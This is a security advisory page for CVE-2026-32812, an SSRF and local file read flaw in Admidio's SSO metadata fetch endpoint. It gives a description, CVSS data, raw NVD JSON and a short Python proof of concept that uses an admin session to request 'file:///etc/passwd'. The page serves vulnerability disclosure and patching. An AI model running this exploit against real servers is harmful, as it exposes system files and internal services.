Security Vulnerability Report
中文
CVE-2026-32812 CVSS 6.8 MEDIUM

CVE-2026-32812

Published: 2026-03-20 02:16:35
Last Modified: 2026-03-23 15:24:40
Source: [email protected]

Description

Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, unrestricted URL fetch in the SSO Metadata API can result in SSRF and local file reads. The SSO Metadata fetch endpoint at modules/sso/fetch_metadata.php accepts an arbitrary URL via $_GET['url'], validates it only with PHP's FILTER_VALIDATE_URL, and passes it directly to file_get_contents(). FILTER_VALIDATE_URL accepts file://, http://, ftp://, data://, and php:// scheme URIs. An authenticated administrator can use this endpoint to read arbitrary local files via the file:// wrapper (Local File Read), reach internal services via http:// (SSRF), or fetch cloud instance metadata. The full response body is returned verbatim to the caller. This issue has been fixed in version 5.0.7.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE
Admidio 5.0.0 - 5.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target_url = "http://target-admidio-site/modules/sso/fetch_metadata.php" # Malicious payload using file:// protocol to read local files payload = { "url": "file:///etc/passwd" } # Administrator session cookie (required for exploitation) cookies = { "PHPSESSID": "valid_admin_session_id" } try: response = requests.get(target_url, params=payload, cookies=cookies) if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print("[+] Response Body:") print(response.text) else: print("[-] Exploit failed. Status Code:", response.status_code) except Exception as e: print("[-] An error occurred:", e)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32812", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:35.043", "lastModified": "2026-03-23T15:24:40.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, unrestricted URL fetch in the SSO Metadata API can result in SSRF and local file reads. The SSO Metadata fetch endpoint at modules/sso/fetch_metadata.php accepts an arbitrary URL via $_GET['url'], validates it only with PHP's FILTER_VALIDATE_URL, and passes it directly to file_get_contents(). FILTER_VALIDATE_URL accepts file://, http://, ftp://, data://, and php:// scheme URIs. An authenticated administrator can use this endpoint to read arbitrary local files via the file:// wrapper (Local File Read), reach internal services via http:// (SSRF), or fetch cloud instance metadata. The full response body is returned verbatim to the caller. This issue has been fixed in version 5.0.7."}, {"lang": "es", "value": "Admidio es una solución de gestión de usuarios de código abierto. En las versiones 5.0.0 a 5.0.6, la obtención de URL sin restricciones en la API de metadatos de SSO puede resultar en SSRF y lecturas de archivos locales. El endpoint de obtención de metadatos de SSO en modules/sso/fetch_metadata.php acepta una URL arbitraria a través de $_GET['url'], la valida solo con FILTER_VALIDATE_URL de PHP y la pasa directamente a file_get_contents(). FILTER_VALIDATE_URL acepta URIs con esquemas file://, http://, ftp://, data:// y php://. Un administrador autenticado puede usar este endpoint para leer archivos locales arbitrarios a través del wrapper file:// (Lectura de Archivo Local), alcanzar servicios internos a través de http:// (SSRF) u obtener metadatos de instancias en la nube. El cuerpo completo de la respuesta se devuelve textualmente al llamador. Este problema ha sido solucionado en la versión 5.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.7", "matchCriteriaId": "4020E2FE-8E51-405F-86CB-DAAFBA7FD9B3"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/commit/f6b7a966abe4d75e9f707d665d7b4b5570e3185a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-6j68-gcc3-mq73", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-6j68-gcc3-mq73", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.